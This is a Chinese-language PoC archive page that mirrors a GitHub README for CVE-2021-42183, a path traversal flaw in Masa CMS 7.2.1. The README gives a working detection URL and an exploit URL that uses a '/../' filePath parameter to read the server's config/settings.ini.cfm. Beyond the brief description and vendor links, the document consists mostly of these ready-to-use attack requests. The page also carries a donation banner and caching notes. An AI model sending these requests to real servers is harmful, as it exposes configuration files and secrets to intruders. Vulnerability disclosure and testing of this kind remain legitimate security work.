目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2021-42183 PoC — Masa CMS 路径遍历漏洞

来源
https://github.com/0xRaw/CVE-2021-42183
关联漏洞
标题:Masa CMS 路径遍历漏洞 (CVE-2021-42183)
Description:Masa CMS是MasaCMS的一个数字体验平台。 Masa CMS 7.2.1版本存在安全漏洞,该漏洞源于/index.cfm/_api/asset/image/缺少对于路径参数的转义导致路径遍历漏洞。
介绍
# CVE-2021-42183

MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/.

# Detection

```
If this file is readable it means the vulnerablilty exists.
https://example.com/index.cfm/_api/asset/image/?filePath=/Application.cfc
```


# Exploit

```
https://example.com/index.cfm/_api/asset/image/?filePath=/../<Path>
- Read The Config File
https://example.com/index.cfm/_api/asset/image/?filePath=/../config/settings.ini.cfm 
```

## Tested On 
MasaCMS 7.2.1

## Vendor

http://www.masacms.com

https://github.com/MasaCMS/MasaCMS
https://github.com/MasaCMS/MasaCMS/blob/01e0636db0ea4c132906724e1b0772c86e263ada/core/mura/content/file/fileManager.cfc#L368


## Discoverd By:

Rawi And BassamAssiri.
文件快照

 [4.0K]  /data/pocs/1455418cb06d2f95ba2f50851de20148233f9cb5
└── [ 733]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。